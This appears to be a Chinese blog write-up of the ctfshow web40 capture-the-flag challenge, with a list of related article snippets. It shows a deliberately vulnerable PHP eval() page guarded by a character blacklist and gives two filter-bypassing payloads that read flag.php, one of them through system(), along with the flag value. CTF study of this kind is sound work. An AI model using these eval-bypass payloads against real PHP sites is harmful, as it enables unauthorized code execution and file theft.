【CTFWP】ctfshow-web40

已于 2025-02-10 11:09:40 修改
阅读量1.4k 收藏 14
点赞数 30
分类专栏: CTF 文章标签: 网络安全 渗透测试 安全 CTF
于 2024-07-30 09:29:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/LongL_GuYu/article/details/140787997
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

题目介绍:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 06:03:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/


if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
        
}else{
    highlight_file(__FILE__);
}

题目分析:

  1. if(isset($_GET['c'])){:检查GET请求中是否存在参数c

  2. $c = $_GET['c'];:如果存在,将参数c的值赋给变量$c

  3. 使用正则表达式检查变量$c中是否不包含一系列特定的字符。这个正则表达式尝试排除一些可能用于代码注入的特殊字符和一些常见符号。

  4. eval($c);:如果$c变量中不包含上述正则表达式定义的任何字符,则使用eval函数执行$c中的PHP代码。这是一个非常危险的操作,因为eval会执行任何传入的PHP代码,这可能包括恶意代码。

  5. }else{:如果GET请求中没有参数c,则执行else块中的代码。

  6. highlight_file(__FILE__);:如果没有参数c,这个函数会高亮显示当前文件的内容。这通常用于调试目的,但在生产环境中使用可能会暴露敏感信息。

  7. }:结束if-else语句。

payload:

?c=echo highlight_file(next(array_reverse(scandir(pos(localeconv())))));

payload解释:

这段代码尝试通过GET请求利用PHP的eval函数执行恶意代码。下面是对这段代码的分析:

  • ?c=echo highlight_file(next(array_reverse(scandir(pos(localeconv())))));:这是一个GET请求的参数c,其值是一个PHP表达式。
  1. echo:PHP中的输出函数,用于输出字符串或表达式的结果。
  2. highlight_file:PHP中的函数,用于高亮显示PHP文件的内容。
  3. next:PHP中的函数,用于将内部指针向前移动到下一个元素。
  4. array_reverse:PHP中的函数,用于反转数组元素的顺序。
  5. scandir:PHP中的函数,用于列出目录中的文件和子目录。
  6. pos:PHP中的函数,返回数组中当前内部指针指向的值。
  7. localeconv():PHP中的函数,返回本地化的数字和货币格式信息。

具体来说,这段代码的执行流程如下:

  1. localeconv():获取本地化的数字和货币格式信息。
  2. pos(localeconv()):获取localeconv()返回数组中当前内部指针指向的值。
  3. scandir(pos(localeconv())):列出pos(localeconv())指向的目录中的文件和子目录。
  4. array_reverse(scandir(pos(localeconv()))):反转这些文件和子目录的顺序。
  5. next(array_reverse(scandir(pos(localeconv())))):将内部指针移动到下一个元素,即下一个文件或子目录。
  6. highlight_file(next(array_reverse(scandir(pos(localeconv()))))):高亮显示这个文件的内容。
  7. echo:输出这个高亮显示的内容。

payload2:

?c=eval(next(reset(get_defined_vars())));&1=;system("tac%20flag.php");

payload2解释:

  1. ?c=eval(next(reset(get_defined_vars())));:这是GET请求的一部分,其中c参数的值是一个PHP表达式。

    • get_defined_vars():这个函数返回当前所有已定义变量的数组,包括局部变量和全局变量。
    • reset():这个函数将数组内部指针指向第一个元素,并返回该元素的值。
    • next():这个函数将数组内部指针向前移动一位,并返回当前指针处的元素值。
    • eval():这个函数执行字符串作为PHP代码。

    这段代码的目的是尝试执行get_defined_vars()返回的第一个元素的下一个元素的值作为PHP代码。

  2. &1=;system("tac%20flag.php");:这是GET请求的另一部分,尝试通过URL参数执行系统命令。

    • system():这个函数执行一个shell命令,并将完整的输出返回。
    • "tac%20flag.php":这里的命令是tac flag.phptac是反向输出文件内容的Unix命令,%20是URL编码的空格。

    这段代码的目的是尝试执行flag.php文件的反向内容。

flag

在这里插入图片描述

flag=“ctfshow{96c8b1e3-29aa-4010-8f8f-c2437ccb6502}”

[ctfshow]web入门——命令执行(web40-web53)
ShenZ的博客
11-29 1526
文章目录web40 web40 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:03:36 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $
CTFshow 命令执行 web40
Kradress的博客
10-30 1900
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:03:36 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c = $_GET['c'];
CTFSHOW web入门——web40
m0_74093152的博客
04-24 683
并且这道题使用到了eval函数(返回传入字符的表达式的结果。即将字符串当成有效的表达式,进行运算、求值并返回结果。构造payload:?过滤了一堆符号,但过滤的括号是中文的括号,所以还是可以正常使用英文括号的。并post参数:b=system(''tac flag.php)可以使用套娃去获得flag.php文件的内容。
ctfshow-web40(命令执行)
m0_62094846的博客
01-22 6261
current() prev() next() reset() end() <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:03:36 # @email: h1xa@ctfer.com # @link: https://ctfer....
ctf.show_web40(命令执行)
高高同学
03-01 782
web40无参数RCE绕过 源码 <?php if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){ eval($c); } }else{ highligh
CTFshow 命令执行 web37-web40
m0_74312676的博客
10-06 1310
(5)将反转后的目录使用next函数,将flag.php文件输出,值得注意的是,我们这里输出的对象是文件,前面用到的print_r函数输出的对象是参数,于是我们这里就只能用show_source或者highlight_file。我们可以看到过滤了好多的符号,最重要的是单双引号,斜杠、逗号、以及$都过滤掉了,这意味着我们之前的哪些方法都用不了了。但是值得一提的是,这里过滤掉的是中文括号,英文括号并没有被过滤掉。有多种方式来实现,最常见的是利用hacker插件,将想要传输的参数,以post的方式传输。
CTFShow-WEB入门篇命令执行详细Wp(29-40)_ctfshow-web入门篇详细wp
2401_84281698的博客
05-12 1049
c=php://filter/read=convert.base64-encode/resource=flag.php #这里过滤了flag不要使用这一条没用 我只是都想测一遍用下面两个。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。php://filter/read=convert.base64-encode/resource=flag.php #伪协议。
CTFShow-WEB入门篇--信息搜集详细Wp_ctfshow web
2401_84297944的博客
04-28 1108
F12。
ctfshow-web41~60-WP
02-21
### CTFShow Web挑战41~60:深入解析与实战技巧 #### 挑战概述 CTFShow是一个提供多样化的网络安全挑战题目的平台,其中包含了大量的Web安全题目供参与者学习与实践。本篇文章主要关注的是CTFShow中的Web挑战第41...
CTFShow-Web篇详细wp(持续更新中ing)_ctfshow web wp
2401_84297944的博客
04-28 503
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。因篇幅有限,仅展示部分资料。
2024年CTFShow-WEB入门篇--信息搜集详细Wp_ctfshow web(1)
2401_84252743的博客
05-01 368
版本控制很重要,但不要部署到生产环境更重要。 扫到文件信息泄露了 上面刚说完这就考到了 可以可以 访问即可。版本控制很重要,但不要部署到生产环境更重要。怎么又是这个提示 不会又是 泄露吧 在 扫一下看看 🆗这回是svn信息泄露!是的缩写,是一个开放源代码的版本控制系统使用后,项目目录下会生成隐藏的文件夹 里面包含备份文件 和这个也是一样的。 发现网页有个错别字?赶紧在生产环境改下,不好,死机了上一题刚说这一题提示就来了 就是 直接访问 即可。 只是一块饼干,不能存放任何隐私数据去网络里面找值 编码解码即
CTFshow-Web入门》04. Web 31~40
学习学习学习......
12-03 1222
eval() 利用与正则绕过,PHP 伪协议、include() 利用。
ctfshow-web入门-命令执行(web37-web40
Welcome To Myon'Blog !
06-07 2365
中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。将我们想要执行的代码包含进去,其实和 php://input 是一样的,让用户可以控制输入流,当它与文件包含函数结合时,用户输入的 data:// 流就会被当作 php 文件执行。就会显示容器有问题了。我们也可以采用编码绕过,对
ctfshow web40-web60系统命令执行 wp
qq_56158055的博客
01-13 553
事先声明,本文只用来学习交流,不参与以任何商业形式的活动。本文不会出现flag。 web40 源码 发现过滤了所有数字,以及大部分的字符,但仔细观察可以发现,括号是中文的括号,因此我们可以利用这点,来进行无参RCE 可以利用p神的无参数RCE来做,利用localeconv()函数来做,也可以用异或和取反来做。 我这边用的是get_defined_vars()函数。 get_defined_vars():返回由所有已定义变量所组成的数组 因此我们可以 发现一堆乱七八糟的 利用
CTFshow web入门 web28~web40 命令执行
qq_56815564的博客
04-12 734
这里可以使用的是data伪协议 data://text/plain,这个相当于执行了php语句,后面跟上的 “.php” 因为前面的php语句已经闭合了,所以后面跟上的 “.php” 会被当成html页面直接显示在页面上,起不到什么作用。很明显,flag应该就在flag.php里,但不能直接访问flag.php 因为不能直接输入字符flag,被过滤了。而filter协议和php://input如果要传的话,必须出现具体的文件名,而flag被过滤了,所以不能用。另外这里的eval($c);
CTFShow-WEB入门篇命令执行详细Wp(29-40)
Aluxian_的博客
06-10 3206
【代码】CTFShow-WEB入门篇--命令执行详细Wp。
CTFShow例题练习命令执行web29-web40
qq_54502707的博客
01-29 2990
大家好,这里是KOKO~ 之前我们通过CTFShow的题目对信息收集和爆破类题目进行了针对练习,今天我们则开始命令执行的练习!
CTFshow 命令执行 web29-web40
m0_73121489的博客
06-25 337
过滤了反引号、左括号和分号,passthru、printf和echo都用不了,取反绕过也不行,多过滤了php和file,PHP伪协议用不了,只能用data协议。BP抓包,用HackBar传参之后没有内容回显。这题解法也差不多,数字换成字母就可以了。过滤了system,php,flag。涉及到一点文件包含,只过滤了flag。然后在源码里就可以看到flag。base64解码即得flag。法一:php://input。很简单,就过滤了flag。新姿势:嵌套文件包含。和web32一个解法。和web32一个解法。
pear文件利用 (远程文件下载、生成配置文件、写配置文件) 从一道题看——CTFshow私教 web40
Jay17的博客
07-26 1220
pear文件利用 (远程文件下载、生成配置文件、写配置文件) 从一道题看——CTFshow私教 web40
CTFSHOW-web-web4
最新发布
12-27
### CTF SHOW Web 类别挑战资源与解决方案 对于参与CTF SHOW平台上Web类别的挑战,特别是针对`web4`这一具体题目,可以借鉴一些通用的Web安全漏洞利用技巧以及特定于该平台的经验分享。通常情况下,这类挑战会涉及到常见的Web应用程序漏洞,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞(LFI/RFI)等。 为了更好地理解和解决这些挑战,可以从以下几个方面入手: #### 学习基础理论和技术 深入理解HTTP协议的工作原理及其请求响应机制是非常重要的。掌握如何通过浏览器开发者工具分析网络流量可以帮助识别潜在的安全问题[^1]。 #### 利用在线学习资源 有许多优质的网站提供了关于Web渗透测试的学习材料和实践环境,例如OWASP Top Ten项目文档,它列举并解释了当前最严重的Web应用风险;还有像PortSwigger Academy这样的平台提供了一系列课程来教授各种类型的Web漏洞挖掘方法。 #### 参考社区讨论和Writeup 加入相关的技术论坛或社交媒体群组,在那里可以看到其他参赛者发布的writeups(解题报告),这对于获取灵感非常有帮助。GitHub上也有很多开源仓库专门收集整理了不同赛事下的高质量writeup链接集合。 ```python import requests def check_sql_injection(url, param): test_payload = "' OR '1'='1" data = {param: test_payload} response = requests.post(url, data=data) if "Welcome" in response.text: print(f"[+] SQL Injection vulnerability detected on parameter '{param}'!") else: print("[-] No SQL Injection found.") ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值